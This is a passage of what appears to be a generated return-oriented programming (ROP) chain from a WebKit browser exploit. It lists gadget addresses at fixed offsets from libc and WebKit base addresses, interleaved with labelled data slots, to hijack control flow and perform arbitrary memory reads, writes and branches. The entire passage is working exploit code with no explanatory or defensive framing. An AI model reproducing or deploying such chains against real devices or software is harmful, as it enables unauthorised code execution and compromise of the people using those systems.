libc_base+763368 //pop rcx
]);
//L7472:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7473:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7474:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+364208, //L7476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+364224, //L7477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+364192, //L7475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7475:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7476:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7477:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+364336, //L7479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+364384, //L7482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+364352, //L7480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7479:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7480:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7481:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7482:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+364496, //L7483+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+364488, //L7483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7483:
db([0, 0]); // 0x0
set_gadgets([
ropchain+364512, //L7483+24
ropchain+368160, //L7478
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7484:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7486:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+364648, //L7489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+364632, //L7487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7487:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7489:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+364808, //L7493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+364760, //L7490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+364776, //L7491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7490:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7491:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7492:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L7493:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+364864, //L7494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7494:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7496:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+364984, //L7497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+365000, //L7499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7497:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7499:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+365176, //L7502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+365192, //L7503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+365144, //L7500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+365160, //L7501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7500:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7501:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7503:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+365272, //L7504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+365288, //L7505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7504:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7505:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+365368, //L7506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+365384, //L7507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7506:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7507:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+365472, //L7508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+365488, //L7510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7511:
db([4294967260, 4294967295]); // -0x24
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+365592, //L7512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+365608, //L7513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7512:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7513:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7514:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7515:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+365736, //L7517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+365720, //L7516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7516:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+365816, //L7518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7518:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7520:
db([4294967260, 4294967295]); // -0x24
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+365936, //L7523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+365920, //L7521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7521:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7523:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+366112, //L7526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+366128, //L7527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+366080, //L7524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+366096, //L7525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7524:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7525:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7526:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7527:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+366208, //L7528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+366224, //L7529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7529:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+366336, //L7530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+366368, //L7532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+366352, //L7531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7530:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7531:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7532:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+366544, //L7534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+366560, //L7535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+366528, //L7533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7533:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7534:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7535:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+366672, //L7537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+366720, //L7540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+366688, //L7538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7537:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7538:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7539:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7540:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+366832, //L7541+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+366824, //L7541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7541:
db([0, 0]); // 0x0
set_gadgets([
ropchain+366848, //L7541+24
ropchain+367416, //L7536
libc_base+764760, //pop rsi
ropchain+366888, //L7542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7542:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7544:
db([4294967260, 4294967295]); // -0x24
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+367008, //L7547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+366992, //L7545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7545:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7547:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+367184, //L7550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+367200, //L7551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+367152, //L7548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+367168, //L7549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7548:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7549:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7550:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7551:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+367280, //L7552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+367296, //L7553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7552:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7553:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+367392, //L7556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+367376, //L7555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7555:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+367432, //L7554
//L7536:
libc_base+759608 //pop rax
]);
//L7557:
db([0, 0]); // 0x0
//L7554:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+367528, //L7560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+367512, //L7559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7558:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7559:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7560:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+367592, //L7561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7561:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7563:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7565:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+367752, //L7568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+367736, //L7566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7566:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7568:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+367896, //L7571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+367864, //L7569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+367880, //L7570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7570:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7571:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+367984, //L7573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7572:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7573:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+368040, //L7574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7576:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+368120, //L7578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7578:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L7478:
//L7427:
//L7316:
libc_base+764760, //pop rsi
ropchain+368200, //L7579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7579:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7581:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+368320, //L7584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+368304, //L7582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7582:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+368400, //L7585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+368416, //L7586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7585:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7586:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+368576, //L7590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+368544, //L7588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+368560, //L7589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7587:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7588:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7589:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7590:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+368632, //L7592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7592:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+368760, //L7594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+368776, //L7595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+368744, //L7593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7593:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7594:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7595:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+368936, //L7599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+368904, //L7597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+368920, //L7598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7596:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7597:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7599:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+368992, //L7601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7601:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+369120, //L7603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+369136, //L7604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+369104, //L7602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7602:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7603:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7604:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+369296, //L7608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+369264, //L7606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+369280, //L7607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7605:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7606:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7607:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7608:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+369352, //L7610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7610:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+369480, //L7612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+369496, //L7613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+369464, //L7611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7611:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7612:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7613:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+369576, //L7614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+369592, //L7615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7614:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7615:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+369680, //L7616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+369696, //L7618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7616:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7618:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7619:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7621:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+369856, //L7624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+369840, //L7622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7622:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+370032, //L7627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+370048, //L7628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+370000, //L7625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+370016, //L7626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7625:
db([0, 0]); // 0x0
